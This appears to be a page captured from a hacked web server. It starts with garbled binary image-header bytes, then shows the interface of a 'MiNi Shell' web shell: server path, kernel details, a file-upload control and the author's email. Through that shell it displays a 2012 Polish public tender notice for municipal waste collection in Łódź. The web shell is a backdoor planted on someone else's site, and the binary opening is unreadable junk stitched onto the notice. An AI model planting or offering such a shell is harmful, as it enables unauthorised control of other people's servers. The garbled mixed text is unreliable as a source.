JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120302/50165-N-2012.html

<p class="kh_header"><b>Łódź: Przetarg na WYWÓZ NIECZYSTOŚCI STAŁYCH ZP/1/2012</b><br>
<b>Numer ogłoszenia: 50165 - 2012; data zamieszczenia: 02.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Bałuty "Bałuty Nowe" , ul. Sędziowska 16, 91-304 Łódź, woj. łódzkie, tel. 42 6546896, faks 42 6546896.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.balutynowe.com3.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg na WYWÓZ NIECZYSTOŚCI STAŁYCH ZP/1/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Wywóz odpadów komunalnych w budynkach administrowanych przez Zamawiającego, wymienionych w załączniku nr 6  do specyfikacji z częstotliwością określoną w załączniku, w tym:
1.1.	dostarczenie i ustawienie pojemników na odpady,
1.2.	opróżnianie pojemników z częstotliwością określoną dla każdej posesji i składowanie ich w miejscu do tego przeznaczonym.
1.3.	wystawianie pojemników z terenu posesji celem opróżnienia oraz ponowne ich wstawianie w miejsca do tego wyznaczone, oczyszczanie miejsca zaśmieconego podczas załadunku,
1.4.	utrzymanie w czystości pojemników, a w okresie od maja do września  do systematycznego dokonywania ich dezynfekcji raz na miesiąc.
2.	Wywóz następujących odpadów wielkogabarytowych (przewidywana ilość 200 m3) 
2.1.	meble, materace
2.2.	dywany, wykładziny dywanowe, chodniki, wykładziny PCV
2.3.	zużyty sprzęt art. gospodarstwa domowego
2.4.	rury, rynny, sprężyny, siatki
2.5.	opony, części samochodowe, wraki samochodowe,
2.6.	piece, kuchnie węglowe
2.7.	drzwi, okna
2.8.	pojemniki metalowe, kosze wiklinowe i druciane,
2.9.	skrzynie drewniane, deski
2.10.	inne odpady wielkogabarytowe, nie wymienione w pkt. 2.1. - 2.9
           w ramach zaproponowanej stawki za wywóz 1m3 odpadów wielkogabarytowych
2.11.	Wywóz nieczystości stałych-kontenery: o poj. 5 m3 KP-5 80 sztuk i o poj 7 m3 KP-7 20 sztuk.
3.	Selektywna zbiórka odpadów.
4.	Wywóz odpadów komunalnych ulegających biodegradacji.
Z uwagi na to, że ilość wytwarzanych odpadów nie jest zależna od zamawiającego to ustalone ilości określone przez Zamawiającego należy przyjąć za szacunkowe i mogą one ulec zmianie, stosownie do rzeczywistych potrzeb Zamawiającego. Podane w załącznikach i formularzu cenowym ilości odpadów należy traktować jako orientacyjne i Wykonawcy nie przysługuje prawo odszkodowania za nieosiągnięcie wskazanych wielkości.  
	Wymagania Zamawiającego:
Wykonawca zapewnia urządzenia do zbierania odpadów.
Za podstawione pojemniki wykonawca nie będzie pobierał oddzielnej opłaty dzierżawy.
Wykonawca obowiązany jest do prowadzenia selektywnej zbiórki odpadów komunalnych oraz wywozu tych odpadów
Dopuszcza się ustawienie pojemników do selektywnej zbiórki odpadów dla kilku nieruchomości łącznie
Wywóz odpadów stałych powinien być prowadzony z zachowaniem ogólnych zasad pozbywania się odpadów komunalnych określonych w Regulaminie utrzymania czystości i porządku na terenie Miasta Łodzi wprowadzonym Uchwałą nr LXII/1159/06 Rady Miejskiej w Łodzi z dnia 14.02.2006r.
Stawki opłat ponoszonych przez właścicieli nieruchomości za usługę pozbycia się odpadów  komunalnych zebranych na terenie nieruchomości nie mogą być sprzeczne z Uchwałą nr V/44/10 Rady miejskiej w Łodzi z 29 grudnia 2010 r. zmieniającą uchwałę w sprawie określenia górnych stawek opłat ponoszonych przez właścicieli nieruchomości za usługę pozbycia się zebranych na terenie nieruchomości odpadów komunalnych oraz nieczystości ciekłych.
	UWAGA !!! 
Nieruchomości wymienione w Załączniku Nr 6 stanowią zasób Gminy Łódź. Z wykonawcą który wygra przetarg, zostaną zawarte również  umowy na nieruchomości prywatne i współwłasne zarządzane przez AN BAŁUTY - NOWE na każdą nieruchomość osobno na okres 9 miesięcy (wykaz nieruchomości wraz z harmonogramem stanowi załącznik nr 7).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wadium jest warunkiem ważności oferty. Wysokość wadium w niniejszym postępowaniu
         wynosi: 9 000 zł (słownie: dziewięć tysięcy zł )                 
2.   Wykonawca wnosi wadium przed upływem terminu składania ofert, o którym mowa 
         w pkt 14.2 w SIWZ 3.   Wadium może być wniesione w:
                 3.1. pieniądzu;
                 3.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- 
                          kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
                 3.3  gwarancjach ubezpieczeniowych;
                 3.4. gwarancjach bankowych;
                 3.5. poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2
                          Ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju  
                          Przedsiębiorczości (Dz. U. nr 109, poz. 1158, z późn. zm.)                
4.   Wadium wnoszone w pieniądzu należy wpłacać przelewem na konto:
                  GETIN BANK S.A.
                  Oddział Regionalny GETIN BIZNES w Łodzi
                  98 1560 0013 2027 2236 9637 0005
                  z zaznaczeniem: (wadium - przetarg ZP/1 /2012) 
          5   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi        
                  na wezwanie, o których mowa w art. 26 ust. 3 Pzp, nie złoży dokumentów lub   
                  oświadczeń o których mowa w art. 25 ust. 1 Pzp, lub pełnomocnictw, chyba że  
                  udowodni, że wynika to z przyczyn  nie leżących po jego stronie art.46 ust 4a Pzp
	     6   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta
                 została wybrana:
             6.1)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
                       określonych w ofercie 
             6.2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z   
                       przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1.1.	posiadania uprawnień do wykonywania określonej działalności lub czynności,   
jeżeli przepisy prawa nakładają obowiązek ich posiadania, potwierdzeniem spełnienia tego warunku będzie:
a)	aktualne na dzień składania ofert  zezwolenie Prezydenta Miasta Łodzi na prowadzenie na terenie Miasta Łodzi działalności w zakresie odbierania odpadów komunalnych.
b)	aktualną na dzień składania ofert umowę ze składowiskiem odpadów na przekazywanie zebranych zanieczyszczeń lub dokument potwierdzający prawo własności do wysypiska.
c)	Aktualne na dzień składania ofert zezwolenie na odbiór i transport odpadów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia potwierdzeniem tego warunku będzie, kiedy       
                  wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu  
                  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym  
                  okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz  
                  załączeniem referencji lub dokumentu potwierdzającego, że usługi te zostały  
                  wykonane należycie, wykonał co najmniej 1 zamówienie o wartości brutto min.   
                           300 000 zł w ciągu 12 miesięcy polegające na usłudze w zakresie przedmiotu  
                           zamówienia   - wykaz wykonanych usług (załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1.3.	     sytuacji ekonomicznej i finansowej zapewniającej wykonanie Zamówienia -   
potwierdzeniem będzie polisa ubezpieczeniowa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na minimum 200 000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz ofertowy (Załącznik Nr 1 do SIWZ)2. Dowód wniesienia wadium. 3.Pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. w formie spółki cywilnej). (jeżeli dotyczy 4. Pełnomocnictwo do podpisania oferty i umowy ( jeżeli dotyczy). 5. Podpisany wzór umowy  (Załącznik nr 5 do SIWZ). 6. aktualną na dzień składania ofert umowę ze składowiskiem odpadów na przekazywanie zebranych zanieczyszczeń lub dokument potwierdzający prawo własności do wysypiska. 7. Aktualne na dzień składania ofert zezwolenie na odbiór i transport odpadów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający na podstawie art. 144 ustawy Pzp dopuszcza zmiany postanowień zawieranej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:
    1.1  Zmianę okresu obowiązywania umowy z powodu okoliczności nieznanych  
              stronom w chwili zawarcia umowy.
   1.2   Zmian podmiotowych po stronie Zleceniobiorcy zgodnie z obowiązującymi  
              przepisami prawa.
   1.3  Zmianę obsługiwanych nieruchomości wynikającą z przyczyn niezależnych od    
              Zamawiającego i nie znaną w chwili zawarcia umowy (np. zmiana stanu     
              prawnego nieruchomości itp.)
 	    1.4  Zleceniodawca zastrzega zmianę typu, ilość i częstotliwość wywożonych     
                        odpadów określonych w harmonogramie.
 1.5  zmiany podatku VAT na przedmiot zamówienia.
   1.6  zmiany cen związanych ze zmianą opłat za składowanie odpadów na wysypisko o   
             opłatę marszałkowską związaną ze zmianą opłat za korzystanie ze środowiska w 
             oparciu o stosowne rozporządzenie Rady Ministrów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.balutynowe.com3.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 91-304 Łódź,  ul. Sędziowska 16
tel./fax (042) 654 - 68- 96.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 09:00, miejsce: Ofertę należy złożyć w Administracji Nieruchomościami Łódź - Bałuty Bałuty Nowe,  ul. Sędziowska 16, 91-304 Łódź, sekretariat, pokój Nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com